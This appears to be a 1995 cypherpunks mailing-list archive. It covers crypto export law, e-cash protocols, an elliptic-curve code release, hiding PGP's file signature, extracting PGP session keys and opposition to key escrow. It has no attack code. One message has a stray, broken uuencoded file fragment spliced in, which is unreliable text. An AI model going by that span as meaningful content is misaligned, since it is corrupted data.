(in particular SSL), can i put the patches up >on an ftp site, Or would i be in violation of itar, and therefore risk >getting hauled off by the feds? (i'm a us citizen living/working in the >states). If you create them in the states, and export them, and they contain crypto, you can be busted and convicted. If you put them on an ftp site without preventing or at least discouraging foreigners from accessing them, you can be busted, but you've at least got a potentially interesting court case about freedom of speech and the press, etc., for which you will need _very_ good lawyers unless either a) Phil Zimmermann gets indicted and acquitted first or b) you don't mind losing. If you do b) before Phil gets his day in court (as opposed to his months and months of grand jury), you risk creating a precedent that can help the Bad Guys convict him. If you create them in the states, and they contain hooks to call crypto, but don't actually contain the crypto themselves, then there's a question of whether they are components of a munition or technical data therefor, or whether they're just code that calls subroutines named "SSL_init()", "DES()", "RSA()", etc., which is behavior that's at least been threatened with FUD, but may be defendable in court. Your case is definitely stronger if your code is public domain (by the ITAR definitions, which are rather different than the copyright-related definitions), and of course if it's part of a working system of purely non-munitions code that just happens to have routines like "Do_Everything_Slowly()", "Reliability_Supporting_Algorithm(), and "SUPDUP_Simulation_Library" -- might even be fun to write a library like that, though I suppose certain companies might be upset if you called your Really_Special_Arithmetic library RSAREF :-) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From cwe at Csli.Stanford.EDU Mon Sep 11 18:07:21 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Mon, 11 Sep 95 18:07:21 PDT Subject: Media coverage of NIST Export meetings? In-Reply-To: <32173.pfarrell@netcom.com> Message-ID: <199509120107.SAA03422@Csli.Stanford.EDU> | Has anyone seen any media coverage of last week's meetings? | I haven't seen anything in either the Washington Post or | the Wall Street Journal. Nothing on radio or local TV either. | | I don't expect much coverage, as Joe Sixpack has no knowledge of | why he should be interested. But I expected at least a paragraph | hidden somewhere inside. Perhaps I missed it. | | Anyone else seen any??? I'm just in the process of sending off the abstract you did plus the pointers to a number of journalist I know. But thats in Sweden, so I guess it doesn't count. :-) /Christian From wilcoxb at land.cs.Colorado.EDU Mon Sep 11 18:49:24 1995 From: wilcoxb at land.cs.Colorado.EDU (Bryce Wilcox) Date: Mon, 11 Sep 95 18:49:24 PDT Subject: Brand e-cash implementation? In-Reply-To: Message-ID: <199509120148.TAA03019@land.cs.Colorado.EDU> -----BEGIN PGP SIGNED MESSAGE----- Michael Froomkin wrote: > > Have there been any implementations, even as trials, of Brands' protocols? > Do any ecash systems on the drawing board even include real user anonymity? Could someone point me to Brand's electronic money protocol? I have heard of it and would like to learn more. If it is a discussable topic then please someone try to convince me that it is better than Chaum's or Chaum's-plus-anonymity-both-ways, or some other candidate for E-Money Protocol Which Has Official Cypherpunk Blessing. (Hopefully a discussion will ensue and rescue this article from that room in Data Hell where posts that ask for help but contribute nothing are sent...) Bryce signatures follow: (new .sig with URL coming soon! Stay tuned for more exciting adventures...) + public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Bryce's Auto-PGP v1.0beta3 iQCVAwUBMFTm5fWZSllhfG25AQHpOQP+MXO8vsxuFnQfaH5cE1t75jihM+m4RsRx vaSHwYZJORdEqdZ4qhLj1WaLqRra+GiSbCiEy2i2kbA5ATyc+1huXCKoIsgF4Rp+ NUBlSG3X1N2iFq2DTvboCanajq0MMcLp1LOlzLPvjoEDuxnZhvSlk2LN6fg9ds3w M4DflyKOmwo= =DqDg -----END PGP SIGNATURE----- From tedwards at src.umd.edu Mon Sep 11 18:53:22 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Mon, 11 Sep 95 18:53:22 PDT Subject: crypto confrontation In-Reply-To: <199509112036.NAA10670@netcom13.netcom.com> Message-ID: On Mon, 11 Sep 1995, Vladimir Z. Nuri wrote: > picketers in front of buildings clashing with police is almost > guaranteed to get a little media coverage, almost no matter what > the issue. I was really considering dropping by the meeting myself, and laying down the line in a very resistant manner, but as usual too much research popped up at the wrong time! Imagine having a copy of PGP in a DHL package addressed to a cyperhpunk in Europe, holding it up and going "I'm mailing this tommorow. Try putting me in jail!" -Thomas From cryptech at Mars.mcs.com Mon Sep 11 21:14:45 1995 From: cryptech at Mars.mcs.com (Mike Rosing) Date: Mon, 11 Sep 95 21:14:45 PDT Subject: Elliptic Curve Public Key Crypto available Message-ID: in the cypherpunks ftp site /pub/cypherpunks/ciphers are 2 ascii files. One contains code and the other contains documentation: eliptic.src and elliptic.doc. The code portion is a cat'ed block of files: headers, C sources and a set of prime numbers. The documentation attempts to explain the math, but it does help if you already know number theory. It hopefully isn't necessary. The code is a specific implementation of one particular type of math. It violates no known patents. It appears to work. The academics claim that elliptic curves over Galois Fields are really secure. Preliminary testing bears this out, changing one bit of input gives uniformly distributed "random" output. Previous to the availabilty of 100 MHz processors this method of public key crypto was ridculously slow. The only versions were laboratory curiosities implemented in ASIC hardware. Code, if it exists, is not in the public domain. The code is based on several papers (some 15 references are listed in the doc file, 6 are more directly important) and a couple of books. It includes optimal normal basis math, elliptic curve math, and public key secret sharing. With 128 bit symmetric encryption, a 226 bit field is more than sufficient to hide it. I believe it is really strong crypto. I did not invent anything. I just implemented a few textbook examples that nobody else has. Since it's from public domain sources, and it's now public domain software, it can be freely used. You get what you pay for. Code is a living thing. It takes lots of people lots of time to make any code useful. The purpose of this code is to show that there is more than one way to create public key cryptosystems and to bring academic discussion into the everyday realm of real world problems. I suggest you get a copy to work with before it becomes illegal ;-) Patience, persistence, truth, Dr. mike From hfinney at shell.portal.com Mon Sep 11 21:54:01 1995 From: hfinney at shell.portal.com (Hal) Date: Mon, 11 Sep 95 21:54:01 PDT Subject: Brand e-cash implementation? Message-ID: <199509120452.VAA14913@jobe.shell.portal.com> From: Bryce Wilcox > Could someone point me to Brand's electronic money protocol? I have heard of > it and would like to learn more. If it is a discussable topic then please > someone try to convince me that it is better than Chaum's or > Chaum's-plus-anonymity-both-ways, or some other candidate for E-Money > Protocol Which Has Official Cypherpunk Blessing. has a good collection of earlier discussions on Brands' cash, as well as pointers to Brands' work itself. Brands' home page, has a long list of advantages which his system has over Chaum's original cash proposals, mostly technical in terms of efficiency and provability. Brands' and Chaum's systems have similar anonymity properties so I don't see much to choose between them on political grounds. Brands tends to work in the context of off-line systems with "observer" chips which prevent double spending. But his protocols can be used in other payment environments as well. Hal Finney From zinc at zifi.genetics.utah.edu Mon Sep 11 22:32:37 1995 From: zinc at zifi.genetics.utah.edu (zinc) Date: Mon, 11 Sep 95 22:32:37 PDT Subject: away from my mail Message-ID: <199509120534.XAA01019@zifi.genetics.utah.edu> I will not be reading my mail for a while. Your mail concerning "Re: CFV: rec.knives" will be read when I'm back. From zinc at zifi.genetics.utah.edu Mon Sep 11 22:48:11 1995 From: zinc at zifi.genetics.utah.edu (zinc) Date: Mon, 11 Sep 95 22:48:11 PDT Subject: spam apology Message-ID: cpunks, sorry for my recent spam of the list due my inept testing of how procmail interacts with the vacation program. -pjf patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA! ** FINGER zinc-pgp at zifi.genetics.utah.edu for pgp public key - CRYPTO! zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=-> http://zifi.genetics.utah.edu From bdavis at thepoint.net Mon Sep 11 23:08:55 1995 From: bdavis at thepoint.net (Brian Davis) Date: Mon, 11 Sep 95 23:08:55 PDT Subject: Digital Fingerprinting In-Reply-To: Message-ID: On Mon, 11 Sep 1995, Duncan Frissell wrote: > > On Sun, 10 Sep 1995, Timothy C. May wrote: > > > If a piece of mail addressed to me is found littering the highway, can I be > > convicted of littering? No, because the _provenance_ of that item of mail > > cannot be determined...it might have accidentally blown out of a trash > > truch delivering my mail to the dump, for example. > > I'm afraid that they are busting people in New York for recycling > violations when they find mail addressed to them mixed in with household > garbage in public trash cans. Finding the mail mixed in there is evidence that supports the "charge" but surely can be rebutted. When I was practicing in a small town c. 1984, people would be summoned (sent a paper telling them to show up) to court for illegal dumping if their mail was found with other trash, old refrigerators, etc., in a creek somewhere. Those charged could always put on proof that Billy Bob's garbage service picked up their trash ... The sentence was almost always to go and pick up some multiple of the garbage found and take it to the landfill. No on was ever "busted" in the way I think of it -- arrested. I guess NY doesn't have as much serious crime as I thought! EBD > DCF > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame way! I get treated worse in person every day!! From carolann at censored.org Mon Sep 11 23:22:44 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Mon, 11 Sep 95 23:22:44 PDT Subject: spam apology Message-ID: <199509120622.XAA05153@usr3.primenet.com> >cpunks, > >sorry for my recent spam Look, the SPAM was hot, and there wasn't too much VELVEETA added other than the mail.cyperpunks category, so it tasted fairly good. It hadn't passed the expiration date, so all is forgiven. Love Always, Carol Anne ps Has anyone ever heard of alt.skullfuck.charles-eicher? Even Gloria Segal doesn't reap that much hatred. -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From A5113643667 at attpls.net Tue Sep 12 00:15:49 1995 From: A5113643667 at attpls.net (Tom Jones) Date: Tue, 12 Sep 95 00:15:49 PDT Subject: draft key mgmt props Message-ID: <3E79EDD0> Dear Cypherpunks, Does anyone here feel like explaining the situation between the three key management proposals now at the internet draft stage? Peace From gjeffers at socketis.net Tue Sep 12 00:19:32 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Tue, 12 Sep 95 00:19:32 PDT Subject: PGP in UK - snooped as unSTEALTHed? Message-ID: <199509121021.FAA22455@mail.socketis.net> >Received: by toad.com id AA16930; Sun, 10 Sep 95 02:10:05 PDT >From: anonymous-remailer at shell.portal.com >Subject: PGP in UK >-----BEGIN PGP SIGNED MESSAGE----- >I heard something rather disturbing the other day from someone I do >business with. I've been telling this company for 18 months or so >about the advantages of PGP and email rather than faxes, and they >finally tried it, liked it, and decided to use it a month or so ago. >Last week they got a visit from the Department of Trade of Industry >and MI5 (or is it MI6?) telling them to stop using PGP or they might >find difficulties getting export licences for their products in >future. The visitors wouldn't say how they knew this company had >been using it. PGP IS MARKED! Well, I just used MIT's PGP 2.6.2 with 3 different users' public keys to encrypt 3 different files. In all 3 files, the first 3 characters were the same (an umlauted A, then an i with an up arrow over it, and then a heart). This beginning 3 character string is apparently the infamous PGP RSA signature. The signature that says to spooks' programmed encryption sniffers - "HEY! I'M PGP - GIVE ME A LOOK!." When are the PGP designers and coders going to get serious and de- velope STEALTH PGP inside PGP itself!? I think that it would take the states at least many thousands of times the computing cycles to spot PGP encrypted files without the RSA signature. - IF it were practical to look for STEALTH PGP at all when snooping communications networks. So what, -that "only a few companies" will be discovered to be using PGP through the RSA signature!? Those few companies are the seeds for the vast numbers of companies that would follow them in using PGP over the Internet. The RSA signature is the flag that allows the spooks to easily net the bold first companies. The RSA signature is greatly impeding the spread of PGP use over the Internet. PGP MUST BE STEALTHED!! ENCRYPTION METHODS' "RANDOM" SIGNATURE PGP files are, of course, compressed to remove redundancy and thus make the method stronger. This, along with the algorithm, produces a "random" bit file. I believe that most files on the Internet are not compressed and thus would show order on statistical sniffing programs. Of the files that are compressed, by PKZIP for example, I believe they would probably have a compression string signature particular to that compression met- hod. Otherwise, compressed files show more randomness. I don't know if compressed programs show an order throughout the file. If they do, then, possibly, PGP could have a function added to it to duplicate this order. This suggests that PGP should also have a function that makes a phoney compression method signature. This would allow PGP'ed files to hide amoung compressed files on the Net. ----------- With the removal of the PGP RSA signature and the addition of phony compression signatures, PGP'ed files would travel the Net without draw- ing attention to themselves. This would greatly facilitate the growth of PGP traffic by organizations. MICROSOFT VERSUS BORLAND FOR COMPILING/ASSEMBLING PGP Oftentimes, Borland C and Assembler can be bought at prices that are a fraction of the price of Microsoft C and Assembler. This suggests that PGP should be programmed with Borland instead of with Microsoft. I think that this would be a step in making PGP a real peoples' encryption method. It is more practical for people to get Borland programming soft- ware than Microsoft programming software. This change from Microsoft to Borland might encourage a lot of experimentation and innovation by a lot of individual and small group programmers. >The person who told me about this also said something about a >Department of Trade & Industry paper which mentioned that the British >Government was going to insist on key escrow for encryption. I had >hoped to get a copy of this, but he can't find it at the moment. >I'll post the text when I get it if anyone's interested. >Anyone else in the UK heard anything about this? >- -- B. >-----BEGIN PGP SIGNATURE----- >Version: 2.6.i >iQEVAgUBMFGPfeHVHXeXphJJAQFJ0Af/Svh0ifULgpEuauSBPFreDDJoa/a1gcPe >ya3CjOde9kVuN0IkBHFubO18MrAO6WbwlhVa/X/pjG4vbSahonpzmgHHfkVW20Gh >qlhBwFLElTmOgspSjHJ74sYNUM2YZ+AKOyNwW4ix6woJ0WL0NP+cV8CZv4tdEH4l >EI3/FuoFccbkKMk7QYoRPOyj5FI4GiFxVsg1GFOU3r83bxfJDfU2yZdImEBx/Nlc >gteizqFTF/QiKckl6f5NzCBzaoIcMw0VLN8dAGLqzDycJtFqGdOPgvgSt1LwXKBs >+zJM5Z/laubYm5SiEPy4oVz9N3lT4EOzEtdMEoiSC6IiSDSaURkEAA== >=GiY0 >-----END PGP SIGNATURE----- >-----BEGIN PGP PUBLIC KEY BLOCK----- >Version: 2.6.i >mQENAi8KzVoAAAEH/2gPfD2Xdw1nDAXtMH/F5iCMrwdXHXolEfOjRP59QP1Yodhb >L+NGSNls67+H1us5PP5EpHDbHRy66ExgRK7XdZ/2qz0SsbTG+R6pRIILmMfgd3Nj >M6uq1DehdxWPdp4PMC9LNrG2V9QrRGPgpHhr3iDfy+p6JTjW8XCYUXn5POt0wBs2 >n/vlowjLf9dVYwUKP58V9gokNsFlGcB08gEbxKa9Y2X7zB3BAlywPVdKVh+BOTCK >z1Sofx9Wup0MEXEDEESLDSq/634hzzVx6Kt54cZBbi5nAdPHWlGHZl5vU93A3jPE >fh59JXsCZmWKLXMjZtjcIJYkC4hC4dUdd5emEkkABRG0DEIuIERlIExhIFBheokB >FQIFEC8g7yzh1R13l6YSSQEBD+4H/ir8R4iw1tWLUuxz6etmV99OhMUYoI5lQnxz >9KARQf4eD3xHPoMw6tHLKOUR8xYS9i2RmkhJrPRzCfD5OKSOBEHuIQEt/+dcbCuw >0fxn9NrU7NjFWwWKQ+0jYikN3hfIWcPmGtyhQ0KSrGfUDo5+rJr5Cy4U6eOooepv >gYniecNNVAzQ2KDiWTOZ5zqG3zBAYj6uw8LHvBR1qol2YcJ4s02c4GdAZmzEq49s >nDBortKfWUAxZkESBt2tMx8gYq6b38evYJBLXOqEN5Lt/5zf0nG1u0BEWBLaCj55 >y8lh1KolVOu808tX9blOrjqwEB12vngjXzf7hHWohrGrrQVT2N4= >=5qEt >-----END PGP PUBLIC KEY BLOCK----- THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY. The United States "Federal" Government - We'll be even more American without it. PUSH EM BACK! PUSH EM BACK! WWWAAAYYYY BBBAAACCCCK! BBBEEEAAATTTT STATE!  From aba at dcs.exeter.ac.uk Tue Sep 12 01:05:41 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 12 Sep 95 01:05:41 PDT Subject: anyone got a cpunk URL for the UK munitions T? Message-ID: <24928.9509120805@exe.dcs.exeter.ac.uk> On the subject of the UK printing of the muntions T-shirt, I've got a problem, I would like to put a URL for how to obtain the T-shirts, and cypherpunk political material, anti ITAR, clipper etc, bu yet I can't very well put my URL: http://www.dcs.ex.ac.uk/~aba/rsa/ because that may possibly move within a year, maybe sooner, and T-shirts are so permanent :-( It seems like too good an opportunity to miss, as some people may get the thing nice publicity, and interest in the cypherpunks take on encryption, so it would be ideal to have an on-line reference on the shirt. So what I was thinking is it would be nice if someone with a permanent URL, could put a pointer to my URL, that could be updated later, as my URL moves? A cypherpunks page which has been and will be around for a *long time* with lots of info or pointers to info on ITAR, the evils of key escrow etc would be ideal. I don't need the WWW space for the actual info as such, just a pointer which can point to where-ever it is my URL moves to, and as most cpunks URLs seem to be in the US, it wouldn't be a v good idea to put my content on a US server anyway (arguably). Any offers? Also now I'm here, there were a few people on the list who ordered shirts from me, and the progress has been slow, if you want to see the reasons, and up-to-date state of progress, take a look at: http://www.dcs.ex.ac.uk/~aba/uk-shirt.html I need to decide soon as to what URL to print, I was otherwise thinking of removing the URL, as my sys admin made some strange cryptic comment about me not having my URL after a while anyway (when I finish the course, pointed comment? who knows), and I thought it might not go down to well if I printed my URL on the T-shirt, at least if it's an indirect pointer I have the option to get alternate WWW space. I have decided to switch printers as the last guy seems to have vanished, no answers to messages on answer phone for > 1 week, and some shirt printers (like the new one I've chosen) offer to the whole job in a week, and people are getting impatient for their shirts. So I ideally need a commitment of a URL so that I can modify the design & send of to this new printers tonight. The main criteria, apart from a nice selection of links (I've got ITAR and cpunk links allready anyway) is that the URL pointing at my roving URL is going to stay there for a few years, at least. Adam From loki at obscura.com Tue Sep 12 01:36:36 1995 From: loki at obscura.com (Lance Cottrell) Date: Tue, 12 Sep 95 01:36:36 PDT Subject: anyone got a cpunk URL for the UK munitions T? Message-ID: My homepage has not got that many links, but it is fairly well known. I would be happy to set up a WWW page just for you. How about: http://obscura.com/~t-shirt/ This will be around for quite a while, since I am getting into the ISP biz, and obscura is my domain. At 1:05 AM 9/12/95, aba at atlas.ex.ac.uk wrote: >On the subject of the UK printing of the muntions T-shirt, I've got a >problem, I would like to put a URL for how to obtain the T-shirts, and >cypherpunk political material, anti ITAR, clipper etc, bu yet I can't >very well put my URL: > > http://www.dcs.ex.ac.uk/~aba/rsa/ > >because that may possibly move within a year, maybe sooner, and >T-shirts are so permanent :-( > >It seems like too good an opportunity to miss, as some people may get >the thing nice publicity, and interest in the cypherpunks take on >encryption, so it would be ideal to have an on-line reference on the >shirt. > >So what I was thinking is it would be nice if someone with a permanent >URL, could put a pointer to my URL, that could be updated later, as my >URL moves? > >A cypherpunks page which has been and will be around for a *long time* >with lots of info or pointers to info on ITAR, the evils of key escrow >etc would be ideal. > >I don't need the WWW space for the actual info as such, just a pointer >which can point to where-ever it is my URL moves to, and as most >cpunks URLs seem to be in the US, it wouldn't be a v good idea to put >my content on a US server anyway (arguably). > >Any offers? > >Also now I'm here, there were a few people on the list who ordered >shirts from me, and the progress has been slow, if you want to see the >reasons, and up-to-date state of progress, take a look at: > > http://www.dcs.ex.ac.uk/~aba/uk-shirt.html > >I need to decide soon as to what URL to print, I was otherwise >thinking of removing the URL, as my sys admin made some strange >cryptic comment about me not having my URL after a while anyway (when >I finish the course, pointed comment? who knows), and I thought it >might not go down to well if I printed my URL on the T-shirt, at least >if it's an indirect pointer I have the option to get alternate WWW >space. > >I have decided to switch printers as the last guy seems to have >vanished, no answers to messages on answer phone for > 1 week, and >some shirt printers (like the new one I've chosen) offer to the whole >job in a week, and people are getting impatient for their shirts. So >I ideally need a commitment of a URL so that I can modify the design & >send of to this new printers tonight. > >The main criteria, apart from a nice selection of links (I've got ITAR >and cpunk links allready anyway) is that the URL pointing at my roving >URL is going to stay there for a few years, at least. > >Adam ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From perry at piermont.com Tue Sep 12 03:25:04 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 12 Sep 95 03:25:04 PDT Subject: draft key mgmt props In-Reply-To: <3E79EDD0> Message-ID: <199509121024.GAA15929@frankenstein.piermont.com> Tom Jones writes: > Does anyone here feel like explaining the situation between the three > key management proposals now at the internet draft stage? Which ones are you refering to? .pm From perry at piermont.com Tue Sep 12 03:29:50 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 12 Sep 95 03:29:50 PDT Subject: PGP in UK - snooped as unSTEALTHed? In-Reply-To: <199509121021.FAA22455@mail.socketis.net> Message-ID: <199509121029.GAA15937@frankenstein.piermont.com> Gary Jeffers writes: > Well, I just used MIT's PGP 2.6.2 with 3 different users' public > keys to encrypt 3 different files. In all 3 files, the first 3 > characters were the same (an umlauted A, then an i with an up arrow > over it, and then a heart). This beginning 3 character string is > apparently the infamous PGP RSA signature. The signature that says > to spooks' programmed encryption sniffers - "HEY! I'M PGP - GIVE ME > A LOOK!." As if they couldn't figure it out anyway. It isn't an "RSA signature" by the way. Read format.doc sometime. > When are the PGP designers and coders going to get serious and de- > velope STEALTH PGP inside PGP itself!? Never, I hope. It would dramatically lower the utility of the system. Can you imagine how disgusting it would be to try decrypting something if you have a dozen keys outstanding? Not to mention how hard it would be to deal with figuring out that you should even try to decrypt things in the first place. > So what, -that "only a few companies" will be discovered to be using PGP > through the RSA signature!? Those few companies are the seeds for the > vast numbers of companies that would follow them in using PGP over the > Internet. The RSA signature is the flag that allows the spooks to easily > net the bold first companies. The RSA signature is greatly impeding the > spread of PGP use over the Internet. PGP MUST BE STEALTHED!! It isn't an RSA signature. Its a bunch of magic numbers. Look, get real already. If someone sees a bunch of random numbers in mail sent by me, its going to be pretty obvious what the hell is inside anyway. I very much see this whole thing as a non-issue. Perry From don at cs.byu.edu Tue Sep 12 03:46:13 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Tue, 12 Sep 95 03:46:13 PDT Subject: Questions on PGP3.0 Message-ID: <199509121046.EAA00209@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- Ok, any of you who are involved in PGP 3.0, please fess up. I know that ^^^^^^^^^^^^^^ it's not even into the RealSoonNow(tm) stages, so I have some questions about features, like are they being addressed/considered/rejected: 1) Extracting & using the IDEA keys 2) Old ID strings retained for signatures, but maybe less obvious 3) Ignoring new ID strings not signed with the key 4) Some kind of This Key will self-destruct in 1 year type of thing so we don't someday have 5 meg keyfiles of revoked keys. Also attempts at dating the signatures on the assumption of honesty 5) Automagically linked keys for secure/nonsecure work 6) Built in rant-detector/filter 7) Add-an-ad, for example "This PGP msg brought to you by Coke!" to help the PGP project gain commercial support. 8) maybe a non-propagation signature, or something to keep joe sixpack from signing a key he just wants to trust (but not declare that trust), because the sig somehow seems to end up up on a keyserver. 9) Grab-for-the-throat replacement of some of the add-in tools. For example, giving PGP some option so that it comes up with a menu, with one of the options being to invoke the editor that some other program thought it was invoking when it ran PGP. 10) Being able to bypass things like This key not fully certified do you want to certify it yourself (y/N). Just some thoughts, not a wish list or anything. Umm, well that #6 maybe... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMFVkycLa+QKZS485AQFLqgL/dvaEnZavsAOiT8eNKJhRLh+Izlxx2QmF sXj+Ps7O+xughkGz+OankAsqhON/iHeWczEVHGa5grIJ1WDlX77lqdANtHjpf2tI QXMD7iLB3gdX4Gy8X2OaQifp2QS8IN4l =gXJQ -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * From postmaster at virgies.com Tue Sep 12 04:20:10 1995 From: postmaster at virgies.com (postmaster at virgies.com) Date: Tue, 12 Sep 95 04:20:10 PDT Subject: Scientology tries to break PGP - and Message-ID: The following message is being returned to its sender because the addressee does not exist at destination . <---- Header information --------------------------------------------> Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by altmail.holonet.net with ESMTP id BAA17972; Sat, 9 Sep 1995 01:50:44 -0700 Received: from toad.com by relay3.UU.NET with SMTP id QQzgkp04297; Sat, 9 Sep 1995 04:49:08 -0400 Received: by toad.com id AA21380; Sat, 9 Sep 95 01:46:19 PDT Received: from blob.best.net by toad.com id AA21371; Sat, 9 Sep 95 01:46:13 PDT Received: from miron.vip.best.com (daemon at miron.vip.best.com [204.156.129.176]) by blob.best.net (8.6.12/8.6.5) with ESMTP id BAA14766; Sat, 9 Sep 1995 01:46:04 -0700 Received: (from daemon at localhost) by miron.vip.best.com (8.6.12/8.6.12) id BAA01249; Sat, 9 Sep 1995 01:41:32 -0700 Date: Sat, 9 Sep 1995 01:41:32 -0700 Message-Id: <199509090841.BAA01249 at miron.vip.best.com> To: andrew_loewenstern at il.us.swissbank.com, cypherpunks at toad.com Remailed-By: remail at extropia.wimsey.com Comments: This message was anonymously remailed. Do not reply to the address in the from header, unless you wish to report a problem. Thank you. From: cypherpunks at toad.com References: <9509081654.AA03407 at ch1d157nwk> Subject: Re: Scientology tries to break PGP - and fails? Sender: owner-cypherpunks at toad.com Precedence: bulk > >Tom Rollins writes: >> If this is the file that the Co$ is trying to crack, then what the >> is being asked for is a pass phrase that can be handed to the Co$ >> that will pass the PGP valid key check and still not decrypt the >> data to anything usefull. > >Well, I don't have the PGP 'conventional' encryption format memorized, but >there is probably a constant after the IV that is prepended to the data. The >constant is used to determine if the key is correct. Since the conventional >encryption runs in CFB mode and there is a full block of random IV at the >beginning of the file, it is extremely unlikely that a key could be found >that would properly decrypt only the first two blocks while leaving the rest >unreadable... > >> If Larry Wollersheim does have the valid key. It would be a simpler >> process to know what fake key to use and work it backwards through >> the MD5 to arrive at an ascii string to produce the fake key. > >Not really. Even if you could find an IDEA key that would produce the >desired output it would be hard to find a passphrase that would produce that >key when hashed. One of the properties of one-way hash functions is that it >is difficult to find a plaintext that produces a given hash. Hence the term >'one-way'.... Even if you did find a passphrase (which, if MD5 is strong, >would require something like 2^64 operations), it would likely be long, have >8-bit chars, and would be impossible to type in. It would be tough to >convince anyone that it was the real passphrase. > > >andrew > There was a hack to pgp ui published a while back that would allow someone decrypting a RSA encrypted file to print out the idea key. Another feature of the hack allowed someone with the idea key to decrypt an RSA PGP encrypted file ignoring the RSA headers and using the IDEA key directly. Using this software should allow the reciever of an RSA PGP encrypted file to allow someone else to decrypt it (by giving them the IDEA key) without exposing the secret key. The IV block check will allow them to check that they are using the correct idea key. From A5113643667 at attpls.net Tue Sep 12 06:06:14 1995 From: A5113643667 at attpls.net (Tom Jones) Date: Tue, 12 Sep 95 06:06:14 PDT Subject: No Subject Message-ID: Dear Cypherpunks and Tom, The ones I've heard about are SKIP, Photurus and ISAKMP(sp?). Peace --- NOTICE: This message originally included graphics and/or sounds which can only be received by AT&T PersonaLink(sm) subscribers. You received only the text portion(s) of the message. Please contact the sender for information that was deleted. To learn how to send and receive graphics, voice and text messages via AT&T PersonaLink Services, call 1-800-936-LINK. ---------------- Received: by attpls.net with Magicmail;12 Sep 95 10:34:32 UT Date: 12 Sep 95 13:05:43 UT Sender: owner-cypherpunks at toad.com (owner-cypherpunks) From: owner-cypherpunks at toad.com (owner-cypherpunks) Subject: Re: draft key mgmt props To: peace at acm.org (Tom Jones) cc: cypherpunks at toad.com (Cypherpunks) Message-Id: <199509121024.GAA15929 at frankenstein.piermont.com> In-Reply-To: > Reply-To: perry at piermont.com (perry) X-X-AUTHENTICATION-WARNING: frankenstein.piermont.com: Host localhost didn't use HELO protocol X-X-REPOSTING-POLICY: redistribute only with permission Tom Jones writes: > Does anyone here feel like explaining the situation between the three > key management proposals now at the internet draft stage? Which ones are you refering to? .pm ---------------- From kelso at netcom.com Tue Sep 12 06:48:09 1995 From: kelso at netcom.com (Tom Rollins) Date: Tue, 12 Sep 95 06:48:09 PDT Subject: VCR+ encode/decode source file error. Message-ID: <199509121345.GAA21447@netcom3.netcom.com> Hello, If anyone is interested, the "vcr+.shar.gz" file from "sable.ox.ac.uk" contains two (2) source files (encode.c and decode.c). These source files both have the same small errors. Change the source line ... int a[12], b[12], out[12] ; To ... int a[18], b[18], out[18] ; And change the source line ... static int start[480], leng[480] ; To ... static int start[512], leng[512] ; -tom From johnl at radix.net Tue Sep 12 07:32:41 1995 From: johnl at radix.net (John A. Limpert) Date: Tue, 12 Sep 95 07:32:41 PDT Subject: 64 bit crypto Message-ID: <01BA80F9.97A820A0@dialin18.annex1.radix.net> >Then the prepare_key routine would take much much longer. > >The idea is that a 64 bit crypto routine can be arbitrarily >secure against brute-forcing, if you are willing to pay a >runtime penalty every time you use it. My thought was that there might be shortcuts that the attacker could use to compute the permutation of the state array in less time. I wrote a small test program to look for cycles and weak keys in the 65536 iteration permutation. I assumed a 40 bit key. One weak key was found, 0x0101010101, that produces a 255 iteration cycle. 375 randomly chosen keys were tested and no cycles were found. There ought to be a faster way to compute the permutation with a more analytical approach. My skepticism tells me that nothing is a replacement for more key bits. In a semi-related question, why don't we see Feistel systems with larger numbers of rounds? Would a modified DES with 256 rounds be any more secure than standard DES? From frissell at panix.com Tue Sep 12 07:58:25 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 12 Sep 95 07:58:25 PDT Subject: GAK Message-ID: <199509121457.KAA28748@panix.com> At 09:25 PM 9/3/95 -0400, Brian Davis wrote: >I, of course, know of the "dislike" of GAK here. I am curious to know, >however, if the "dislike" is because government would have access under >any circumstances or if the primary worry is that government will cheat >and get access when most would agree that they shouldn't (either by the >judge "cheating" or a TLA stealing it). Individuals will have their individual objections. My objections are that I don't like governments spending tax money that they don't absolutely have to. Their own survival is *not* a necessity. I think controlling people's speech is a waste of money. Very few Common Law crimes (ie real crimes) are dependent on wiretap evidence for solution. Only phoney bureaucratic crimes (the retail pharmaceutical trade, insider trading, gambling, conspiring to overthrow the government, etc) need wiretaps. My second objection is the control of people's speech. If I communicate with someone, I want to communicate with *them*. I don't want to communicate with the Feds. The Supremes have held that the right to speak includes the 